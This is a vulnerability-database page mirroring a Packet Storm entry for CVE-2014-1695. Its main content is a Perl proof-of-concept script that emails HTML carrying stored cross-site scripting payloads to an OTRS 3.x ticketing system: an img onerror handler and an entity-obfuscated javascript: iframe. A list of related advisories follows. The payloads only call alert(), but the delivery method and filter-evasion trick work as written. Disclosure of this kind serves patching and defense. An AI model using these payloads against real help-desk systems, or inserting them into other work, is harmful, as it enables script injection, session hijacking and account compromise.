Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAdam ZiajaPACKETSTORM:131654
HistoryApr 27, 2015 - 12:00 a.m.

OTRS 3.x Cross Site Scripting

2015-04-2700:00:00
Adam Ziaja
packetstormsecurity.com
18

0.043 Low

EPSS

Percentile

91.4%

JSON
`# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS  
# Date: 28.01.2014  
# Exploit Author: Adam Ziaja http://adamziaja.com  
# Vendor Homepage: https://www.otrs.com  
# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5  
# CVE : CVE-2014-1695  
  
#!/usr/bin/perl -w  
use strict;  
use MIME::Lite;  
my $msg = MIME::Lite->new(  
Subject => 'OTRS XSS PoC',  
From => '[email protected]',  
To => '[email protected]',  
Type => 'text/html',  
Data =>  
'<html><body><img/onerror="alert(\'XSS1\')"src=a><iframe  
src=javasc&#x72ipt:alert(\'XSS2\') ></body></html>'  
);  
$msg->send();  
  
  
`

Related

zdt 1
nessus 4
freebsd 1
debiancve 1
prion 1
cve 1
exploitpack 1
ubuntucve 1
securityvulns 2
mageia 1
cvelist 1
openvas 3
exploitdb 1
osv 1
debian 1
zdt
zdt
OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS) Vulnerability
2015-04-27 00:00:00
nessus
nessus
openSUSE Security Update : otrs (openSUSE-SU-2014:0360-1)
2014-06-13 00:00:00
FreeBSD : otrs -- XSS Issue (70b72a52-9e54-11e3-babe-60a44c524f57)
2014-02-26 00:00:00
Mandriva Linux Security Advisory : otrs (MDVSA-2014:054)
2014-03-14 00:00:00
freebsd
freebsd
otrs -- XSS Issue
2014-02-25 00:00:00
debiancve
debiancve
CVE-2014-1695
2014-03-01 00:01:00
prion
prion
Cross site scripting
2014-03-01 00:01:00
cve
cve
CVE-2014-1695
2014-03-01 00:01:00
exploitpack
exploitpack
OTRS 3.1.x 3.2.x 3.3.x - Persistent Cross-Site Scripting
2015-04-27 00:00:00
ubuntucve
ubuntucve
CVE-2014-1695
2014-03-01 00:00:00
securityvulns
securityvulns
[ MDVSA-2014:054 ] otrs
2014-05-05 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2014-05-05 00:00:00
mageia
mageia
Updated otrs package fixes security vulnerability
2014-03-03 00:58:54
cvelist
cvelist
CVE-2014-1695
2014-02-28 17:00:00
openvas
openvas
OTRS Email HTML Injection Vulnerability (OSA-2014-03)
2014-03-04 00:00:00
Mageia: Security Advisory (MGASA-2014-0114)
2022-01-28 00:00:00
Debian: Security Advisory (DLA-1119-1)
2018-02-06 00:00:00
exploitdb
exploitdb
OTRS &lt; 3.1.x / &lt; 3.2.x / &lt; 3.3.x - Persistent Cross-Site Scripting
2015-04-27 00:00:00
osv
osv
otrs2 - security update
2017-09-30 00:00:00
debian
debian
[SECURITY] [DLA 1119-1] otrs2 security update
2017-09-30 19:36:15

0.043 Low

EPSS

Percentile

91.4%

JSON
Related for PACKETSTORM:131654
zdt1nessus4freebsd1debiancve1prion1cve1exploitpack1ubuntucve1securityvulns2mageia1cvelist1openvas3exploitdb1osv1debian1